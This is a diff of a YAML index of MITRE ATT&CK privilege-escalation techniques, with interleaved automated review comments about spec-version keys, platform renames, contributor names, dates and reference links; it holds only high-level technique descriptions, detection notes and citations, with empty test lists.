name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
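Review bot: in the T1574.013 tail, both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing is added in their place, whereas the newer-format objects in this patch keep (and bump) `x_mitre_attack_spec_version` while dropping only `spec_version`. Check that T1574.013 is not left without an `x_mitre_attack_spec_version` at all; if the key was relocated it should appear as a `+` line earlier in the object, and the `@@ -21021` hunk for this technique does not show one.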
@@ -21130,9 +21442,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -21199,7 +21510,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -21273,11 +21583,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -21294,7 +21603,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -21304,7 +21612,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21313,19 +21621,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
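Review bot: the T1078 platform list drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`, with the version bump to 2.7 reflecting that. Any per-platform index derived from `x_mitre_platforms` will now file T1078 under the new names, so the platform-specific index files need to be regenerated in the same PR or the technique silently disappears from the old ones. The `x_mitre_modified_by_ref` removal here is a move rather than a deletion, since the key reappears at the end of the object in the `@@ -21373` hunk.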
@@ -21373,11 +21679,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -21445,23 +21752,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
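Review bot: the `Leitch Hollowing` reference swaps `http://www.autosectools.com/process-hollowing.pdf` for `https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf`, a third-party re-host rather than a Wayback snapshot of the original, unlike the `bencane blog bashrc` reference later in this patch, which was repointed to `web.archive.org`. Verify the mirrored PDF is the same document (the diff cannot show that) and prefer an archive.org capture of the original URL for consistency. Separately, T1068's `modified` moves back from 2023-10-31 to 2023-04-07 while its `x_mitre_attack_spec_version` stays at 3.1.0 in the `@@ -21524` hunk; confirm that combination matches the upstream object.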
@@ -21524,11 +21830,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -21581,8 +21886,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
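Review bot: `Office 365` is replaced by `Office Suite` in T1546's platforms with the version bumped to 1.4, the same rename applied to T1078 in the `@@ -21313` hunk; make sure the platform-specific index for the old name is regenerated too. The hunk shows only one `-`/`+` pair, so if T1546 also listed `Azure AD` or `Google Workspace` elsewhere in its platform list, those would need the same treatment and are not visible here.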
@@ -21630,78 +21935,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
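Review bot: this hunk deletes the entire head of T1546.004 (platforms, domains, contributors, marking refs, id, type, created, created_by_ref and all 13 external references) and replaces only the `modified` line; every one of those keys is re-added in reordered form in the `@@ -21770` hunk, and the reference count matches (13 removed, 13 re-added), so this is a key reorder rather than a content change. The only substantive differences inside the block are the new `modified` date and, in the re-added `bencane blog bashrc` entry, the switch to a `web.archive.org` URL with the retrieved date updated to September 25, 2024. A delete/re-add of roughly 70 lines for that makes review error-prone; a deterministic key order in the generator would reduce it to a couple of lines.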
@@ -21749,6 +21987,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -21759,9 +22001,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -21770,8 +22016,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1134.005:
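Review bot: `revoked: false` is added to T1546.004 here but has no counterpart among the removed lines of the `@@ -21630` hunk, so it is new data rather than a moved key. That is useful for consumers that filter out revoked techniques, but it should then be present on every technique in the index; the other re-emitted object tails in this patch (T1078 at `@@ -21373`, T1546 at `@@ -21630`) do not show it being added, so either those objects carry it elsewhere or the field is inconsistently populated. The `bencane blog bashrc` reference now pointing at a Wayback capture (`web.archive.org/web/20220316014323/...`) with the retrieved date moved to September 25, 2024 is the right way to handle a dead link.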
@@ -21817,7 +22122,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21842,13 +22147,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
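Review bot: T1134.005 ends up with neither `spec_version` nor `x_mitre_attack_spec_version` after this hunk, since both `-` lines have no `+` replacement in view; unless the generator re-emits `x_mitre_attack_spec_version` earlier in the object, this technique (like T1574.013 in `@@ -21047`, T1037.003, T1055.009 and T1055.005 further down) loses its spec tagging while the 3.x-format objects keep theirs. A quick grep of the regenerated file for technique objects lacking the key would settle it.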
@@ -21928,7 +22231,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -21964,7 +22266,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21987,12 +22289,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -22070,12 +22371,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -22136,7 +22436,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -22180,7 +22479,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -22202,7 +22501,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -22283,7 +22581,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -22306,7 +22603,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -22336,12 +22633,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22426,7 +22721,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -22491,7 +22785,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -22566,7 +22859,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22594,7 +22887,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -22625,7 +22917,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22668,12 +22960,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22690,7 +22980,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
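Review bot: the contributor rename `Alexander Rodchenko` -> `Rodchenko Aleksandr` puts the surname first, the opposite direction of the `Goldstein Menachem` -> `Menachem Goldstein` change in the `@@ -21304` hunk, so the two edits pull in opposite directions on name order. Verify both against the current upstream contributor strings rather than assuming either is a correction; since this file is regenerated, a hand-fix here would be overwritten on the next run anyway.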
@@ -22749,7 +23039,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -22831,12 +23120,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22933,7 +23221,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -23047,7 +23334,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -23117,7 +23403,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -23145,7 +23430,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -23189,8 +23474,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -23226,7 +23509,7 @@ privilege-escalation:
